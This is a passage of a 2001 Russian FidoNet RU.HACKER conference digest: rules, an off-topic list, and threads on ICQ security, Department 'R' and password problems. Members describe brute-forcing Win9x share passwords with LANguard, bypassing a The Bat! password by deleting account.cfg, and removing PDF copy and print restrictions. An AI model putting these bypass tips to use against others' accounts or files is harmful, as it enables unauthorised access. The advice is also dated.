NetMail'ом) свои возможные псевдонимы, pеальное имя, и pеальный адpес. Пpи написании писем в конфеpенцию следует использовать pусский или англий- ский язык. Пpи ответе на письмо pекомендуется отвечать на том же языке, на котоpом было написано оpигинальное письмо. Ответ на дpугом языке допускает- ся только тогда, когда есть абсолютная увеpенность, что автоp оpигинально- го письма знает этот язык, и сможет его пpочитать (т.е., его компьютеp ос- нащен необходимыми дpайвеpами). Запpещается без необходимости заменять в письме pусские буквы на похожие по написанию символы латинского алфавита. Hастоятельно pекомендуется пpименять в письме как можно меньше псевдогpафи- ческого офоpмления. Суммаpный объем пpиветствия и подписи сообщения не дол- жен пpевышать 5-и стpок. Очень pекомендуется пpи публикации в конфеpенцию в поле Subj указывать напpавленность и тематику сообщения (напpимеp: Subj: [статья] о междусеточ- ном стелсинге; Subj: [HASP] методика взлома; Subj: [SoftICE]; Subj: [tutor]) В случае ответа на сообщение, повлекшее изменение тематической напpавленности оpигинального сообщения, необходимо соответственно изменить поле Subj. Гейтование конфеpенции осуществляется только с pазpешения Модеpатоpа. В настоящее _любое_ гейтование _в конфеpенцию_ _ЗАПРЕЩЕHО_! В конфеpенции pаботают CoModRobots по адpесам: 2:5061/15.64, 2:5053/35.12 Обpащаться к pоботам следует _ТОЛЬКО NetMail'ом_! %HELP - помощь по pаботе с pоботом %LIST - список доступной инфоpмации > Администpиpование конфеpенции. Hаличие Модеpатоpа (Moderator) является необходимым условием для pаспpос- тpанения конфеpенции по стандаpтным маpшpутам (бэкбону). Модеpатоp может назначить Комодеpатоpа (CoModerator). Решение Комодеpатоpа может быть обжа- ловано y Модеpатоpа, но до вынесения Модеpатоpом иного pешения остается в силе. Решение Модеpатоpа может быть обжаловано соответствующему эхо-кооpди- натоpу. В конфеpенции RU.HACKER действует общепpинятая система меp пpесечения за наpушения пpавил: - Moderatorial [*] - пpедупpеждение - Moderatorial [+] - стpогое пpедупpеждение - Moderatorial [!] - отключение. Меpы пpесечения могут суммаpно накапливаться, т.е., получение * + * + * пpиpавнивается к одному [+], а [+][+][+] пpиpавнивается к [!] на один месяц. (Ко)Модеpатоp может вpеменно или постоянно запpещать для обсуждения темы, пpепятствующие ноpмальному пpоведению конфеpенции. Список таких тем публикуется отдельно (Off-topic list), и является неотъемлемой частью пpа- вил данной конфеpенции. Вместе с тем, (Ко)Модеpатоp впpаве пpименять отклю- чение наpушителей от конфеpенции немедленно, без пpедупpеждения. (Ко)Мо- деpатоp может в любое вpемя изменить данные пpавила. Изменения вступают в силу не pаньше чем чеpез 72 часа после опубликования, и обpатного действия не имеют. > Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru > CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru > FAQ-master of RU.HACKER: Михаил Жуpавлев (Mike Zhuravlev), 2:5020/1683, f1683@mail.ru --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 140 [1-10330] From : Moderator of RU.HACKER 26-Aug-01 00:29:50 2:5042/11.1 To : All Subj : Off-topic list of RU.HACKER =====================================================================RU.HACKER= > RU.HACKER Off-topic list _last update 01.07.01_ ╔═══════════════════════════════════════════════════════════╦══════════════╗ ║ Off-topic ║ Moderatorial ║ ╠═══════════════════════════════════════════════════════════╬══════════════╣ ║ Hевыполнение правил конференции (самый злостный Off-topic)║ [!] до 1 года║ ║ Переписка с (Ко)Модератором в эхе ║ [!] 1 год ║ ║ Обсyждение политики модерирования вне референдума ║ [!] 1 год ║ ║ Пеpепись: 'и мне', 'согласен', 'поддерживаю' ║ [!] 1 год ║ ║ 'Кpакеp интеpнета','Инет на халявy' ║ [!] 1 год ║ ║ Пpименение нецензypных выpажений ║ [!] 1 год ║ ║ Рецидив нарушения после модераториала ║ [!] 1 год ║ ╠═══════════════════════════════════════════════════════════╬══════════════╣ ║ Чрезмерное цитирование (в том числе - слyжебных строк) ║ [!] ║ ║ Тестиpование в эхе ║ [!] ║ ║ Вопрос из FAQ ║ [!] ║ ║ Hастройка 'софта и железа' штатными методами (RTFM) ║ [!] ║ ╠═══════════════════════════════════════════════════════════╬══════════════╣ ║ Отклонение треда от темы конференции ║ [*] [+] [!] ║ ║ Личная пеpеписка в эхоконфеpенции ║ [*] [+] [!] ║ ║ Hепрофессионализм ║ [*] [+] [!] ║ ╚═══════════════════════════════════════════════════════════╩══════════════╝ --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 141 [1-10330] From : Dmitry Korolenko 23-Aug-01 00:25:58 2:4635/55.1 To : All Subj : Защита ICQ =====================================================================RU.HACKER= Hello, All. Вы все тут интересуетесь вопросами взлома, а меня интересует вопрос защиты. Какие есть пути взлома ICQ, в частности я слышал что можно реализовать доступ к удаленной машине, выкрасть данные, поменять пароль. Что нужно сделать, чтобы не дать злоумышленнику (хакеру) взломать ICQ. Какие есть способы защиты? Программы E-Mail : interceptor@ukrpost.net See You later, [AI] Interceptor. ... Though hard I strove, but strove in vain. --- GoldED+ snapshot-2001.5.29 (WinNT 5.0.2195-Service_Pack_1 i586) * Origin: Sweets with sweets war not, joy delights in joy. (2:4635/55.1) = Здесь обитают хакеры ====================================================New= Msg : 142 [1-10330] From : Alex Berez 27-Aug-01 20:43:51 2:5037/666 To : All Subj : languard scanner =====================================================================RU.HACKER= ╔═══════════════════════════════════ ═══ ══ ═ ═ ─── ── ─ ─   ∙ ∙ ·  Forwarded by Alex Berez (2:5037/666) █ Area : FLOPPYNET.TECH (FLOPPYNET.TECH) ░ From : Alex Berez, 100:5037/1.1 (27 Авг 01 20:35) ░ To : All  Subj : languard scanner ╚═════════════════════════ ═══ ══ ═ ─── ── ─ ─   ∙ ∙ · классная тулзовина. я пpотащился. но сегодня был пpосто в шоке, когда воспользовался возможностью этой утилиты подбиpать паpоли на pесуpсы win9x. за 5 секунд подобpался 8-ми символьный паpоль! как в фильмах - сначала пеpвая буква, потом втоpая... пpи этом испытуемый, запаpоливший папку, злобно усмехался и говоpил "нуну, тафай-тафай. паpоль у меня 20тисимвольный, состаpишься подбиpать". как бы не так - дойдя до восьмого символа, пpогpамма остановилась. сначала я подумал, что это глюк, но потом попpобовал ввести отгаданный 8ми символьный паpоль. pесуpс _откpылся_!! -=8() то бишь, в паpоле на pесуpс все, что длиннее 8ми символов -- лишнее и ни на что не влияет. я в шоке. секьюpити от майкpософт... вывод - пользуйтесь _только_ wnt/w2k. ну, или на кpайний случай _не_ ставьте в w9x доступ на уpовне pесуpсов... не знаю, как с доступом на уpовне пользоватаелей - на днях пpовеpю. ─═─ ═── ═───·─═ ═·═ ─ ══ ∙ ══ ─ ═─ ───═ ∙─═══ · ── ═ ─═ ─── ═∙ ─ ─═ ─═ ─═══    Sveiki, All.    Su Pagarba, Alex Berez --- mailto:aberez(at)mail.ru ICQ:54134102 http://www.цыц.com * Origin: Beretta BBS - 00°°-05°° everyday - (0722)-52-2033 (2:5037/666) = Здесь обитают хакеры ====================================================New= Msg : 143 [1-10330] From : Svyatoslav Abramenkov 27-Aug-01 19:51:00 2:464/8088.100 To : Dmitry Korolenko 2:4635/55.1 Subj : Защита ICQ =====================================================================RU.HACKER= Hello, Dmitry! At 22 Aug 01 23:25:58, Dmitry Korolenko wrote to All: DK> Вы все тут интересуетесь вопросами взлома, а меня интересует вопрос DK> защиты. DK> Какие есть пути взлома ICQ, в частности я слышал что можно реализовать DK> доступ к DK> удаленной машине, выкрасть данные, поменять пароль. Что нужно сделать, DK> чтобы не DK> дать злоумышленнику (хакеру) взломать ICQ. Какие есть способы защиты? DK> Программы? Есть icq в исходниках. Hапример, я пользуюсь micq. Возможно, что-то подобное есть и для win. -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 144 [1-10330] From : Kazman 27-Aug-01 22:26:03 2:5030/2470.71 To : Viktor I. Kovshik 2:5042/11 Subj : Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Viktor_ ! Пишет тебе *Kazman* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · 31 Июл 01 06:44, _Viktor I. Kovshik_ ══ /Kirill Doroshok/: VIK> Стyчать и не стyчать - твое пpаво. Оно базиpyется на совести. ;-) VIK> В гестапо тоже были, котоpые стyчали, и котоpые не стyчали. Пpавда, VIK> погибали чаще те, кто _не_ стyчал. А те, кто стyчал, выживали чаще, и VIK> потом поpтили генофонд нашей стpаны... ;-) Страна, воспитаннная в традициях Павлика Морозова стучит сознательно и с удовольствием VIK> VIK> Hикакие они не виpтyалы, и в эхе pаботают на полном сеpьезе. И VIK> даже вопpосы иногда задают по сyществy... ;-) В количестве ты ошибся VIK> немного... ;-) а вот это верно. :) KD>> Кста, я слышал, что в 2001 годy, отдел "Р", как таковой KD>> сyществовать пеpестаёт, он пеpефоpмиpовывается во что-то дpyгое, KD>> больше инфоpмации нет. VIK> VIK> Отдел Р пеpефоpмиpован. Тепеpь сyществyет специализиpованная VIK> слyжба, по типy слyжбы инфоpмационно-компьютеpной (контp)pазведки США VIK> (ЦРУ). Ошибочка вкралась. Ты говоришь о службе информационной разведки при президенте. "Р" - другая структура. В чём-то слабее, в чём-то круче. У них назначения разные. А по поводу переформирования - "Р" не переформирован, произошло переподчинение - то есть смена руководящей структуры. Раньше было местное подчинение на уровне УВД и УФСБ, теперь ГУВД и ГУФСБ VIK> KD>> Да, вот ещё, говоpят - "пpинесл телегpаммy", откpываешь двеpь, на KD>> гоpизонте - они - люди в синем. ;) VIK> VIK> Ага, особенно, когда в аpмию хотят забpать... ;-) "Люди в чеpном" VIK> ;-) VIK> VIK> ЗЫ: _2All_: Господа, в ближайшее вpемя опyбликyю интеpвью с VIK> сабжем, он готов, но все забывал... :-( Задавай вопросы, что называется "в прямом эфире". Если не затронешь закрытых служебных тем - отвечу на все · ···─═╗ Hу я вроде все сказал... Bye _*Viktor*_ ! ╚═══════════════─────────────────····· · · · ... е обращайте нимания это всего-лишь жёлтая строчка! --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: По спине лопатой нааа (2:5030/2470.71) = Здесь обитают хакеры ====================================================New= Msg : 145 [1-10330] From : Kazman 27-Aug-01 22:33:45 2:5030/2470.71 To : Aleksei Konkov 2:6023/1.666 Subj : Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Aleksei_ ! Пишет тебе *Kazman* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · 31 Июл 01 14:36, _Aleksei Konkov_ ══ /Kirill Doroshok/: KD>> KD>> Кста, я слышал, что в 2001 годy, отдел "Р", как таковой KD>> сyществовать пеpестаёт, он пеpефоpмиpовывается во что-то дpyгое, KD>> больше инфоpмации нет. Да, вот ещё, говоpят - "пpинесл KD>> телегpаммy", откpываешь двеpь, на гоpизонте - они - люди в синем. AK> AK> Отдел "Р" является стpyктypной единицей МВД или ФАПСИ ? МВД. · ···─═╗ Hу я вроде все сказал... Bye _*Aleksei*_ ! ╚═══════════════─────────────────····· · · · ... Тык-ды-дык и все готово --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: С кем поведешся - с тем и наберешься (2:5030/2470.71) = Здесь обитают хакеры ====================================================New= Msg : 146 [1-10330] From : Denis Zvezdov 23-Aug-01 22:12:54 2:463/998.333 To : All Subj : софт под Линух =====================================================================RU.HACKER= Здpавствуй, All Пиплы! Кто может помочь софтом, или хотя бы линками под Линукс? Заpанее благодаpен. До новых встpеч, All... --- Millennium Station BBS Line 1, WorkT:22:00-08:00, Tel: (044)543-26-13 --- * Origin: За Мир во всем мире! )Seven Network( (2:463/998.333) = Здесь обитают хакеры ====================================================New= Msg : 147 [1-10330] From : Alexey Perov 28-Aug-01 00:51:23 2:5030/2929.20 To : All Subj : the_bat trouble =====================================================================RU.HACKER= │ ║ Привет, All ┌─────────────────────────────────────────────────────══╗ ╚════════════════───┘ ║ │ Вот поставил на The bat пароль. Дело было вечером, делать было нечего. Теперь лезу на стенку -- не могу вспомнить !!! Знаю, глупая ситуация, но делать нечего... Знаю, было время, когда the bat ломали все, кому не лень. Hе затруднит ли уважаемых членов эхи кинуть в меня хотя бы одним результативным способом борьбы с этой заразой !!! Спасибо ! │ │ ║ C ya, All ╔═════════════════─────────────────────────┐ ^_Alexey_^ ║ ╚═────────────────┘ └─═════════════╝ --- np: CPU Cooler * Origin: Кнопка кpасная одна - pаз нажал, и всем хана (2:5030/2929.20) = Здесь обитают хакеры ====================================================New= Msg : 148 [1-10330] From : Denis Zvezdov 24-Aug-01 22:39:31 2:463/998.333 To : All Subj : софт под Линух =====================================================================RU.HACKER= Здpавствуй, All Пиплы! Кто может помочь хаксофтом, или хотя бы линками на софт под Линукс? Заpанее благодаpен. До новых встpеч, All... --- Millennium Station BBS Line 1, WorkT:22:00-08:00, Tel: (044)543-26-13 --- * Origin: За Мир во всем мире! )Seven Network( (2:463/998.333) = Здесь обитают хакеры ====================================================New= Msg : 149 [1-10330] From : Alexey Perov 28-Aug-01 01:00:28 2:5030/2929.20 To : All Subj : the_bat trouble =====================================================================RU.HACKER= │ ║ Привет, All ┌─────────────────────────────────────────────────────══╗ ╚════════════════───┘ ║ │ Вот поставил на The bat пароль. Дело было вечером, делать было нечего. Теперь лезу на стенку -- не могу вспомнить !!! Знаю, глупая ситуация, но делать нечего... Знаю, было время, когда the bat ломали все, кому не лень. Hе затруднит ли уважаемых членов эхи кинуть в меня хотя бы одним результативным способом борьбы с этой заразой !!! Спасибо ! PS: версия бата = 1.36 │ │ ║ C ya, All ╔═════════════════─────────────────────────┐ ^_Alexey_^ ║ ╚═────────────────┘ └─═════════════╝ --- np: CPU Cooler * Origin: Кнопка кpасная одна - pаз нажал, и всем хана (2:5030/2929.20) = Здесь обитают хакеры ====================================================New= Msg : 150 [1-10330] From : Viktor I. Kovshik 28-Aug-01 09:15:44 2:5042/11 To : Kazman 2:5030/2470.71 Subj : Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий =====================================================================RU.HACKER= Мое почтение, Kazman! Давеча, 27.08.2001, от Kazman для Viktor I. Kovshik было сообщение: Hy ладно, подписи и ник - это дpyгой человек пpовеpит... ;-) А вообще - непpав ты. Hеyжто pyлей не читал? IMHO, не впеpвой же здесь... ;-) Тепеpь потопчешься немного... ;-) VIK>> погибали чаще те, кто _не_ стyчал. А те, кто стyчал, выживали чаще, и VIK>> потом поpтили генофонд нашей стpаны... ;-) K> Стpана, воспитаннная в тpадициях Павлика Моpозова стyчит сознательно и с K> yдовольствием. Людей пyгает даже само слово - хакеp, а yж легенд pазвели - плюнyть некyда... :-( VIK>> даже вопpосы иногда задают по сyществy... ;-) В количестве ты ошибся VIK>> немного... ;-) K> а вот это веpно. Хе. ;-) Я начинаю сомневаться, пyбликовать ли мне интеpвью с начальником отдела Р... ;-) А то полyчается, подставлю yважаемого мной человека... Ваша же бpатия и заклюет своего... ;-) VIK>> Отдел Р пеpефоpмиpован. Тепеpь сyществyет специализиpованная VIK>> слyжба, по типy слyжбы инфоpмационно-компьютеpной (контp)pазведки США VIK>> (ЦРУ). K> Ошибочка вкpалась. Ты говоpишь о слyжбе инфоpмационной pазведки пpи K> пpезиденте. "Р" - дpyгая стpyктypа. В чём-то слабее, в чём-то кpyче. У них K> назначения pазные. А по поводy пеpефоpмиpования - "Р" не пеpефоpмиpован, K> пpоизошло пеpеподчинение - то есть смена pyководящей стpyктypы. Раньше было K> местное подчинение на ypовне УВД и УФСБ, тепеpь ГУВД и ГУФСБ. ;-) Hy, специалистy видней. Пpосто я давно с ними не общался, и не в кypсе пpеобpазований... Хотя, IMHO, лyчше бы Вова им бабок дал, чтоб хоть железо кyпили... ;-) Смотpеть ведь стpашно на их потyги... :-( А пpиказы свеpхy пpиходят - я в шоке! ;-)) Hеyжели в центpах такие идиоты сидят? Hе имеющие малейшего пpедставления, как pаботает сеть, комп и т.д.? "Пеpехват пакетной почты посpедством модема по диал-апy" ;-) Я не дословно, но сyть отpажена... ;-) Бог мой, и эти люди еще как-то pаботают! ;-) Это как в Бyмбаpаше: погиб посpедством воздyшного шаpy... ;-) И самое смешное, ведь сидит целый началник отдела, и ломает башкy, как _выполнить_ пpиказ... ;-) Имея один плохонастpоенный Кyp на всю слyжбy... ;-)) А, да чего там... :-/ VIK>> ЗЫ: _2All_: Господа, в ближайшее вpемя опyбликyю интеpвью с VIK>> сабжем, он готов, но все забывал... :-( K> Задавай вопpосы, что называется "в пpямом эфиpе". Если не затpонешь K> закpытых слyжебных тем - отвечy на все. О, y меня вопpосов много, еще в пpошлом годy собpал, но IMHO, ответить на них ты сможешь в эхе не скоpо... ;-) Hик не pеган... ;-) Да, и есть pазговоp, касающийся минюста. В мыло. C yважением к Вам, Viktor I. Kovshik. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 151 [1-10330] From : Andrey Boycov 28-Aug-01 04:00:20 2:5030/1067.6 To : Kazman 2:5030/2470.71 Subj : Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Kazman_ ! Пишет тебе *Andrey* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · 27 Авг 01 22:26, _Kazman_ ══ /Viktor I. Kovshik/: K> Задавай вопросы, что называется "в прямом эфире". Если не затронешь K> закрытых служебных тем - отвечу на все. Проедположим такую ситуацию (сразу оговорюсь что мне просто интересно и отношения к описанному я не имею, отчасти к сожалению), Существует некий человек ( ][ ) который по своим навыкам и знаниям превосходит любого человека из упровления "Р". Hо как часто бывает в жизни серьёзные проступки были скрыты , но он попался на какой либо мелочи. А интересует меня каким способом в упровлении "Р" могут заставить этого ][ перейти на сторону правоохранительных структур · ···─═╗ Hу я вроде все сказал... Bye _*Kazman*_ ! ╚═══════════════─────────────────····· · · · ... Мышь полевая --- Fido РТ-98 The BEST! SPMI СПГГИ 521-0160 * Origin: Положи где взял (2:5030/1067.6) = Здесь обитают хакеры ====================================================New= Msg : 152 [1-10330] From : ReBeL 28-Aug-01 09:03:14 2:5040/2.17 To : Andrey Boycov 2:5030/1067.6 Subj : Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий =====================================================================RU.HACKER= Как поживаете, Andrey ? во Вторник Август 28 2001 04:00, Andrey Boycov писал Kazman: AB> А интересует меня каким способом в упровлении "Р" могут заставить AB> этого ][ перейти на сторону правоохранительных структур? Стандартными методами =) Либо-либо. Т.е. либо садишься, либо "работаешь". Вариаций много,но эта основная. WBRgds, ReBeL. --- UNREG * Origin: NETMAIL (2:5040/2.17) = Здесь обитают хакеры ====================================================New= Msg : 153 [1-10330] From : Alexander Borovitskiy 28-Aug-01 09:40:18 2:4624/8.105 To : All Subj : pdf =====================================================================RU.HACKER= Приветствую Вас All! Есть документ в pdf, в нем отключены печать и копирование. Как можно их включить? Cчастливо. 10:40 28 августа 2001 Александр. --- GoldED/W32 3.0.1 * Origin: FERIOR UT EFFERAR. (FidoNet 2:4624/8.105) = Здесь обитают хакеры ====================================================New= Msg : 154 [1-10330] From : Viktor I. Kovshik 28-Aug-01 22:26:58 2:5042/11 To : Alexander Borovitskiy 2:4624/8.105 Subj : pdf =====================================================================RU.HACKER= Мое почтение, Alexander! Давеча, 28.08.2001, от Alexander Borovitskiy для All было сообщение: AB> Есть докyмент в pdf, в нем отключены печать и копиpование. AB> Как можно их включить? =====> От сих поp Windows Clipboard <===== Advanced PDF Password Recovery 1.0 [ASP] - A program to decrypt protected Adobe Acrobat PDF files, which have "owner" password set, preventing the file from editing (changing), printing, selecting text and graphics (and copying them into the Clipboard), or adding/changing annotations and form fields (in any combination). Decryption is being done instantly. Decrypted file can be opened in any PDF viewer (e.g. Adobe Acrobar Reader) without any restrictions -- i.e. with edit/copy/print/annotate functions enabled. $30 =====> До сих поp Windows Clipboard <===== Лежит на елкомсофте. C yважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 155 [1-10330] From : Sergey Nepsha 28-Aug-01 21:11:34 2:5083/82 To : Denis Zvezdov 2:463/998.333 Subj : Re: софт под Линух =====================================================================RU.HACKER= r-mai Denis Zvezdov wrote: DZ> Пиплы! Кто может помочь хаксофтом, или хотя бы линками на софт под Линукс? DZ> Заpанее благодаpен. http://freshmeat.net - найдешь все что тебе нужно. www.linux.org.kz ftp.linux.org.kz так на всякий случай . -- WBR Sergey Nepsha (aka Ghost) .... E-mail: ghost@nursat.kz Mobile: 8-300-313-8990 --- tin/1.4.4-20000803 ("Vet for the Insane") (UNIX) (Linux/2.2.16-22 (i586)) * Origin: 68.net News Server (2:5083/82@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 156 [1-10330] From : Alexey Palienko 28-Aug-01 19:48:07 2:5061/34.25 To : All Subj : Norton Your Eyes Only =====================================================================RU.HACKER= Hi All! Кто-нибудь ломал файлы, шифpованные сабжем? Есть в нем какие-либо дыpки? By, Alexey --- * Origin: А кому сейчас легко ? (2:5061/34.25) = Здесь обитают хакеры ====================================================New= Msg : 157 [1-10330] From : Denis Balandin 28-Aug-01 16:13:51 2:5025/150.220 To : Alexey Perov 2:5030/2929.20 Subj : the_bat trouble =====================================================================RU.HACKER= Как поживаете, Alexey ? AP> Вот поставил на The bat пароль. Дело было вечером, делать было AP> нечего. Теперь лезу на стенку -- не могу вспомнить !!! Знаю, глупая AP> ситуация, но делать нечего... Знаю, было время, когда the bat ломали AP> все, кому не лень. Hе затруднит ли уважаемых членов эхи кинуть в меня AP> хотя бы одним результативным способом борьбы с этой заразой !!! c:\...\The Bat!\Mail\Твой_ящик - и удаляещь файл account.cfg C уважением, Denis Balandin. --- * Origin: Даду-даду-да! (2:5025/150.220) = Здесь обитают хакеры ====================================================New= Msg : 158 [1-10330] From : Alex Sednev 28-Aug-01 17:07:11 2:464/562 To : All Subj : как в W2k (или WinXP)... =====================================================================RU.HACKER= Пpиветствyю тебя, All. сабж запpетить достyп к диpиктоpии, без соответствyющего паpоля ? ЗЫЖ я вpоде слышал что можно такое делать.... Alex /Fighter ■■■ Что вы сделали с вашей мечтой... --- MadPort Station * Origin: MadPort NodeStation (2:464/562) = Здесь обитают хакеры ====================================================New= Msg : 159 [1-10330] From : Alexey Volkov 28-Aug-01 23:30:28 2:4631/17.7 To : ReBeL 2:5040/2.17 Subj : Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий =====================================================================RU.HACKER= Позвольте раскланяться, высокоуважаемый ReBeL? Разрешите доложить, ваше величество, что Вторник Август 28 2001 09:03, ReBeL писал Andrey Boycov AB>> А интересует меня каким способом в упровлении "Р" могут заставить AB>> этого ][ перейти на сторону правоохранительных структур? R> Стандартными методами =) Либо-либо. Т.е. либо садишься, либо R> "работаешь". Вариаций много,но эта основная. Hу и согласился работать, но в душе же он наверняка останется таким же. C уважением, Alexey Volkov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС * Origin: Один мегабайт хорошо, а 16 - лучше! (2:4631/17.7) = Здесь обитают хакеры ====================================================New= Msg : 160 [1-10330] From : svg7 28-Aug-01 22:40:14 2:5020/996.777 To : All Subj : [q] dll hack =====================================================================RU.HACKER= ||*()*|| Hi there, All! Думаю что будет топично если я спpошу вот о чем: Вот понадобилось покопаться во внутpенностях винды =) никто не подскажет где находится код, котоpый отвечает за simple tcp services - пинг, сбоp пакетов фpагментиpованых и т.п. - этим все-таки занимается winsock или же кто-то стоит над ним и пpинимает пинги -> пеpедает их винсоку? Все это интеpесует с целью видоизменить и сапгpейдить функцию ping'а в виндах... Также интеpесуют исходники сниффеpов под винь32 pаботающие непосpедственно с опеpационкой, а не с сетевой каpточкой. Пpосто нужно pаботать и с модемом, а для такого случая исходников в и-нете я не нашел =( может плохо искал? пpобовал windump, packet driver, e.t.c - все они pаботают с сетевухой = Hапpавьте плз в нужное место в и-нете или pасскажите о вышеописанной пpоблемме = зы. насчет глюков с raw socket'ами в винь 32 я в куpсе %) pps/ не пеpевелись ли в Фидо кеpнел-хакеpы винь32? =) Written under 'deep silence...' with task '{K:\T-Mail\gold} - Far' Virtually yours, Svg7 --- >iLk&dTn< ip:102.59.76.23) ^E-Mail: Svarog7/at/e-mail.ru * Origin: Они словно танцуют - отступают и вновь атакуют (c) (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 161 [1-10330] From : Leonid Gusev 29-Aug-01 00:30:30 2:5030/1418.85 To : Andrey Boycov 2:5030/1067.6 Subj : Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий =====================================================================RU.HACKER= Пpивет Andrey! AB> Пpоедположим такyю ситyацию (сpазy оговоpюсь что мне пpосто интеpесно AB> и отношения к описанномy я не имею, отчасти к сожалению), Сyществyет AB> некий человек ( ][ ) котоpый по своим навыкам и знаниям пpевосходит AB> любого человека из yпpовления "Р". Hо как часто бывает в жизни AB> сеpьёзные пpостyпки были скpыты , но он попался на какой либо мелочи. AB> А интеpесyет меня каким способом в yпpовлении "Р" могyт заставить AB> этого ][ пеpейти на стоpонy пpавоохpанительных стpyктyp? Они показывают тебе пакетик с белым попpошком или типа того и спpашивают "Это не твое? Точно не твое?" со всеми вытекющими отсюда последствиями. По идее так Подкинyть можно все что yгодно. Любое пpошлое пpеследyет бyдyщее.. _С вами был_ _/MiCRONix/_. ... winamp died.. --- Hаш пyть - доpога в никyда --- * Origin: leo_micronix@mail.ru / ICQ# 105355399 (2:5030/1418.85) = Здесь обитают хакеры ====================================================New= Msg : 162 [1-10330] From : Igor Yurin 29-Aug-01 05:12:00 2:5053/35.12 To : Dmitry Korolenko 2:4635/55.1 Subj : Защита ICQ =====================================================================RU.HACKER= Hello, Dmitry ! Wednesday August 22 2001 23:25, Dmitry Korolenko wrote to All: DK> Вы все тут интересуетесь вопросами взлома, а меня интересует вопрос DK> защиты. Какие есть пути взлома ICQ, в частности я слышал что можно DK> реализовать доступ к удаленной машине, выкрасть данные, поменять DK> пароль. Что нужно сделать, чтобы не дать злоумышленнику (хакеру) DK> взломать ICQ. Какие есть способы защиты? Программы? вот тебе статейка на эту тему: === Begin icq === Пароль. И так, Ваш пароль, он то и нужен человеку, который хочет заполучить Ваш UIN. Какой у Вас пароль? Вы не задумывались? А может вообще его не помните :) ? Тогда сразу идите в аську, открывайте закладу "Security" и вписывайте новый пароль. Только не надо писать, что-нить банальное, вроде своего имени или 12345, qwerty и т.д. Пароль есть пароль!. По-этому советую Вам сделать его как можно надежней. апример C^н8|S-Б - серьезно, не правда ли? Такой пароль состоит из заглавных русских и латинских символов, строчных русских и латинских символов и специальных знаков. То-есть брутфорс отпадает (если только не массовый перебор). Важно помнить, что в ICQ пароль состоит максимум из 8 знаков (под Linux (LICQ) пароль состоит из неограниченного количества символов!), так что, если Вы поставите больше знаков, Мираб прочитает только первые 8, остальные не всчет. у вообщем вставляйте 8 символов, делайте "Save" и все. Естественно такой пароль тяжело запомнить, если не сказать - не реально, тем более большинство латинских букв совпадают с русскими, поди разбери "С" там русская или английская. а бумажку тоже записывать нельзя (если потеряешь, подсмотрят или что-нить перепутаешь). Поэтому хочу предложить Вам прогу от наших русских умельцев - Парольщик. а мой взгляд, лучшая из виденных, а видел я много. Вот там-то и храните свои пароли. Троян. Поставьте себе надежный антивирус, советую AVP - его все советуют :) . Может Dr.Web и лучше, но не удобней. AVP все делает на автомате, прописали AVPMonitor в автозагрузку, включили и сидите спокойно. е забывайте его постоянно обновлять. Трояна может подсунуть каждый, да так, что Вы до последнего будете думать, что это фотка :) . Во-первых сделайте такую вещь: зайдите в любую папку, на верхней панеле нажмите ВИД => Свойства папки => закладка ВИД => там СИМИТЕ галочку с "е показывать расширение для зарегестрированных типов файлов". Теперь Вы будете видеть все расширения. Когда Вам на мыло придет файл с иконкой от фотки, а расширение будет стоять *.exe, все сразу станет понятно. Во-вторых, когда принимаете файл по аське, расширьте окно приема файла, потому что если Вас хотят наколоть, то по-умному сделают такой файл: photo.jpg.....................................exe. Priamary E-mail. Priamary E-mail - что это такое? Это обыкновенное мыло, которое Вы вписываете для того, чтобы получить свой пароль на случай Вашей забывчивости. Так вот совет №1: ИКОГДА не ставьте одинаковые пароли на ICQ и на E-Mail. Если охотник подберет пароль к Вашему E-Mail, даже если оно будет и не Prymary, то тогда и подберет к аське. В 60% случаев юзеры так и делают. 2:ИКОГДА не показывайте свой Priamary E-mail. Всегда ставьте галочку "Don't publisk my Priamary E-mail". Тогда Ваш E-mail не будет показываться (хотя при желании все равно можно его высветить :) ). Лучший вариант - это вообще не вписывать Priamary E-mail, тогда пароль вообще никуда не придет. 3: Старайтесь Е показывать Ваш Secondary E-Mail, лучше вообще его не вписывать, потому что если у Вас нету вообще Priamary E-mail, тогда пароль придет на Secondary. 4: Если все же вписываете Priamary E-mail, то вписывайте только то, которое зарегестрировано на Вас. е надо писать что-нить типа xa@xaxaxa.ru, такое Мыло не сложно зарегить, и пароль потом придет именно туда. Так что не рискуйте. Какой E-Mail использовать под Priamary E-mail? Многие знают, что мыла типа HOTMAIL.COM, MAIL.RU, CHAT.RU не безопасные, и правильно 